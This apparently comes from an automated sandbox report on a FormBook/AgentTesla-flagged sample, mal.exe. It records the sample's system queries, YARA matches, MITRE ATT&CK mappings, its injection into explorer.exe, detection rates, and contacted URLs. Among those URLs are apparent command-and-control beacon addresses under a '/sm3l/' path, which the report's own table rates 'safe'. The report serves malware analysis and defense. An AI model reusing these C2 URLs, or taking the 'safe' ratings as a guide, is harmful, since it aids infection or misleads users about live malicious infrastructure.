          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\mal.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.mal.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.mal.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000000.294198475.0000000006254000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303434465.0000000001490000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.302913257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.469299117.0000000003010000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.303482002.00000000014C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.467414216.00000000001B0000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Rootkit1Credential API Hooking1Security Software Discovery121Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion31NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection612LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 452374 Sample: mal.pif Startdate: 22/07/2021 Architecture: WINDOWS Score: 100 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 4 other signatures 2->40 10 mal.exe 3 2->10         started        process3 file4 28 C:\Users\user\AppData\Local\...\mal.exe.log, ASCII 10->28 dropped 50 Tries to detect virtualization through RDTSC time measurements 10->50 52 Injects a PE file into a foreign processes 10->52 14 mal.exe 10->14         started        signatures5 process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Sample uses process hollowing technique 14->58 60 Queues an APC in another process (thread injection) 14->60 17 explorer.exe 14->17 injected process8 dnsIp9 30 www.mybabytennis.com 209.99.64.55, 49741, 80 CONFLUENCE-NETWORK-INCVG United States 17->30 32 www.sarahcarver.com 52.58.78.16, 49744, 80 AMAZON-02US United States 17->32 42 System process connects to network (likely due to code injection or exploit) 17->42 21 control.exe 17->21         started        signatures10 process11 signatures12 44 Modifies the context of a thread in another process (thread injection) 21->44 46 Maps a DLL or memory area into another process 21->46 48 Tries to detect virtualization through RDTSC time measurements 21->48 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          mal.exe61%VirustotalBrowse
          mal.exe26%MetadefenderBrowse
          mal.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
          mal.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          2.2.mal.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mybabytennis.com/fashion_trends.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoBxA10%Avira URL Cloudsafe
          http://www.fontbureau.comuei0%Avira URL Cloudsafe
          http://www.mybabytennis.com/px.js?ch=10%Avira URL Cloudsafe
          http://www.sarahcarver.com/sm3l/?y0DdGli=yq5bXiAgrpTP0Cl4DWGobHu0GmgEguW+SJypzbO1DFimS8AGhR5rfP7J/muem3koPRQw&ixo0sr=dFQtk0%Avira URL Cloudsafe
          http://www.mybabytennis.com/High_Speed_Internet.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lpt0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/12471/arrow.png)0%Avira URL Cloudsafe
          http://www.founder.com.cn/cns-m_=0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/sys0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/12471/libgh.png)0%Avira URL Cloudsafe
          http://www.mybabytennis.com/Migraine_Pain_Relief.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lp0%Avira URL Cloudsafe
          http://www.fontbureau.comcomde:i0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp//0%URL Reputationsafe
          http://www.mybabytennis.com/All_Inclusive_Vacation_Packages.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz0%Avira URL Cloudsafe
          http://www.goodfont.co.krT0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.fontbureau.comgrito0%URL Reputationsafe
          http://www.fontbureau.comgrito0%URL Reputationsafe
          http://www.fontbureau.comgrito0%URL Reputationsafe
          http://www.sandoll.co.kr.kr0%Avira URL Cloudsafe
          http://www.goodfont.co.krn0%Avira URL Cloudsafe
          http://www.fontbureau.comde:i0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix0%Avira URL Cloudsafe
          http://www.mybabytennis.com/sm3l/?y0DdGli=KvXnBCtAoO2yHEt5dL0Fxw3RJm1prCWWr0IwHlUk90%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.fontbureau.comueu0%Avira URL Cloudsafe
          http://www.sandoll.co.krB0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)0%Avira URL Cloudsafe
          http://www.tiro.comlic&0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)0%Avira URL Cloudsafe
          http://www.fontbureau.com-mI:0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cnf0%Avira URL Cloudsafe
          http://www.carterandcone.comi0%URL Reputationsafe
          http://www.carterandcone.comi0%URL Reputationsafe
          http://www.carterandcone.comi0%URL Reputationsafe
          http://www.fontbureau.come.com0%URL Reputationsafe
          http://www.fontbureau.come.com0%URL Reputationsafe
          http://www.fontbureau.come.com0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.mybabytennis.com/Best_Penny_Stocks.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoB0%Avira URL Cloudsafe
          http://www.urwpp.deeg0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn00%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/v0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/v0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/v0%URL Reputationsafe
          www.trendtechpros.com/sm3l/0%Avira URL Cloudsafe
          http://www.mybabytennis.com/Parental_Control.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoBx0%Avira URL Cloudsafe
          http://www.fontbureau.comcomF0%URL Reputationsafe
          http://www.fontbureau.comcomF0%URL Reputationsafe
          http://www.fontbureau.comcomF0%URL Reputationsafe
          http://www.fontbureau.comld90%Avira URL Cloudsafe
          http://www.founder.com.cn/cn80%Avira URL Cloudsafe
          http://www.mybabytennis.com/display.cfm0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b0%Avira URL Cloudsafe
          http://www.mybabytennis.com/px.js?ch=20%Avira URL Cloudsafe
          http://www.sarahcarver.com0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff20%Avira URL Cloudsafe
          http://www.galapagosdesign.com/R:0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/490%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
